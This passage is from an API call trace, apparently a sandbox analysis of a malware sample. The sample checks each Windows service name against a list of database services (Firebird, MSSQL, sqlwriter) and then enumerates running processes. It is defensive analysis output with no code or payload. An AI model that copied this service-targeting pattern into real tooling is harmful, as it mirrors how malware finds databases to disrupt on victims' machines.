(lpString="Appinfo") returned 7 [0059.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0059.981] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0059.981] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0059.981] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0059.981] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0059.981] lstrlenW (lpString="AppXSvc") returned 7 [0059.981] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0059.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0059.982] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0059.982] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0059.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0059.982] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0059.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0059.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0059.982] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0059.982] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0059.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0059.982] lstrlenW (lpString="Audiosrv") returned 8 [0059.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0059.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0059.982] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0059.982] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0059.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0059.982] lstrlenW (lpString="BFE") returned 3 [0059.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0059.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0059.982] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0059.982] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0059.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0059.982] lstrlenW (lpString="BITS") returned 4 [0059.982] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0059.982] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0059.982] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0059.982] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0059.982] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0059.982] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0059.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0059.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0059.983] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0059.983] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0059.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0059.983] lstrlenW (lpString="CDPSvc") returned 6 [0059.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0059.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0059.983] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0059.983] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0059.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0059.983] lstrlenW (lpString="ClickToRunSvc") returned 13 [0059.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0059.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0059.983] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0059.983] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0059.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0059.983] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0059.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0059.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0059.983] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0059.983] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0059.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0059.983] lstrlenW (lpString="CryptSvc") returned 8 [0059.983] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0059.983] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0059.983] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0059.983] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0059.983] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0059.984] lstrlenW (lpString="DcomLaunch") returned 10 [0059.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0059.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0059.984] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0059.984] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0059.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0059.984] lstrlenW (lpString="DeviceAssociationService") returned 24 [0059.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0059.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0059.984] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0059.984] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0059.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0059.984] lstrlenW (lpString="Dhcp") returned 4 [0059.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0059.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0059.984] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0059.984] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0059.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0059.984] lstrlenW (lpString="Dnscache") returned 8 [0059.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0059.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0059.984] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0059.984] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0059.984] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0059.984] lstrlenW (lpString="DoSvc") returned 5 [0059.984] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0059.984] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0059.984] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0059.984] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0059.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0059.985] lstrlenW (lpString="DPS") returned 3 [0059.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0059.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0059.985] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0059.985] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0059.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0059.985] lstrlenW (lpString="DusmSvc") returned 7 [0059.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0059.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0059.985] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0059.985] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0059.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0059.985] lstrlenW (lpString="EventLog") returned 8 [0059.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0059.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0059.985] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0059.985] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0059.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0059.985] lstrlenW (lpString="EventSystem") returned 11 [0059.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0059.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0059.985] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0059.985] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0059.985] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0059.985] lstrlenW (lpString="FontCache") returned 9 [0059.985] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0059.985] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0059.985] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0059.986] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0059.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0059.986] lstrlenW (lpString="gpsvc") returned 5 [0059.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0059.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0059.986] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0059.986] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0059.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0059.986] lstrlenW (lpString="iphlpsvc") returned 8 [0059.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0059.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0059.986] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0059.986] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0059.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0059.986] lstrlenW (lpString="KeyIso") returned 6 [0059.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0059.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0059.986] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0059.986] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0059.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0059.986] lstrlenW (lpString="LanmanServer") returned 12 [0059.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0059.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0059.986] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0059.986] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0059.986] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0059.986] lstrlenW (lpString="LanmanWorkstation") returned 17 [0059.986] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0059.986] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0059.987] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0059.987] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0059.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0059.987] lstrlenW (lpString="lfsvc") returned 5 [0059.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0059.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0059.987] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0059.987] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0059.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0059.987] lstrlenW (lpString="lmhosts") returned 7 [0059.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0059.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0059.987] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0059.987] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0059.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0059.987] lstrlenW (lpString="LSM") returned 3 [0059.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0059.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0059.987] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0059.987] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0059.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0059.987] lstrlenW (lpString="MapsBroker") returned 10 [0059.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MapsBroker") returned -1 [0059.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MapsBroker") returned -1 [0059.987] lstrcmpiW (lpString1="sqlwriter", lpString2="MapsBroker") returned 1 [0059.987] lstrcmpiW (lpString1="mssqlserver", lpString2="MapsBroker") returned 1 [0059.987] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MapsBroker") returned 1 [0059.987] lstrlenW (lpString="MpsSvc") returned 6 [0059.987] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0059.987] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0059.988] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0059.988] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0059.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0059.988] lstrlenW (lpString="NcbService") returned 10 [0059.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0059.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0059.988] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0059.988] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0059.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0059.988] lstrlenW (lpString="netprofm") returned 8 [0059.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0059.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0059.988] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0059.988] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0059.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0059.988] lstrlenW (lpString="NlaSvc") returned 6 [0059.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0059.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0059.988] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0059.988] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0059.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0059.988] lstrlenW (lpString="nsi") returned 3 [0059.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0059.988] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0059.988] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0059.988] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0059.988] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0059.988] lstrlenW (lpString="PcaSvc") returned 6 [0059.988] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0059.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0059.989] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0059.989] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0059.989] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0059.989] lstrlenW (lpString="PlugPlay") returned 8 [0059.989] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0059.989] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0059.989] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0059.989] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0060.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0060.512] lstrlenW (lpString="Power") returned 5 [0060.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0060.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0060.512] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0060.512] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0060.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0060.512] lstrlenW (lpString="ProfSvc") returned 7 [0060.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0060.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0060.512] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0060.512] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0060.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0060.512] lstrlenW (lpString="RpcEptMapper") returned 12 [0060.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0060.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0060.512] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0060.512] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0060.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0060.512] lstrlenW (lpString="RpcSs") returned 5 [0060.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0060.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0060.512] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0060.512] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0060.512] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0060.512] lstrlenW (lpString="SamSs") returned 5 [0060.512] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0060.512] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0060.512] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0060.513] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0060.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0060.513] lstrlenW (lpString="Schedule") returned 8 [0060.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0060.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0060.513] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0060.513] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0060.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0060.513] lstrlenW (lpString="SecurityHealthService") returned 21 [0060.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0060.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0060.513] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0060.513] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0060.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0060.513] lstrlenW (lpString="SENS") returned 4 [0060.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0060.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0060.513] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0060.513] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0060.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0060.513] lstrlenW (lpString="ShellHWDetection") returned 16 [0060.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0060.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0060.513] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0060.513] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0060.513] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0060.513] lstrlenW (lpString="Spooler") returned 7 [0060.513] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0060.513] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0060.513] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0060.514] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0060.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0060.514] lstrlenW (lpString="SSDPSRV") returned 7 [0060.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0060.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0060.514] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0060.514] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0060.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0060.514] lstrlenW (lpString="StateRepository") returned 15 [0060.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0060.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0060.514] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0060.514] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0060.514] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0060.514] lstrlenW (lpString="SysMain") returned 7 [0060.514] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0060.514] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0060.514] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0060.514] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0060.514] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c0978 | out: hHeap=0x5d0000) returned 1 [0060.514] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c0 [0060.519] Process32FirstW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.520] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.521] lstrlenW (lpString="System") returned 6 [0060.521] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.521] lstrlenW (lpString="smss.exe") returned 8 [0060.521] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.522] lstrlenW (lpString="csrss.exe") returned 9 [0060.522] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.523] lstrlenW (lpString="wininit.exe") returned 11 [0060.523] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.523] lstrlenW (lpString="csrss.exe") returned 9 [0060.523] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.524] lstrlenW (lpString="winlogon.exe") returned 12 [0060.524] Process32NextW (in: hSnapshot=0x2c0, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, 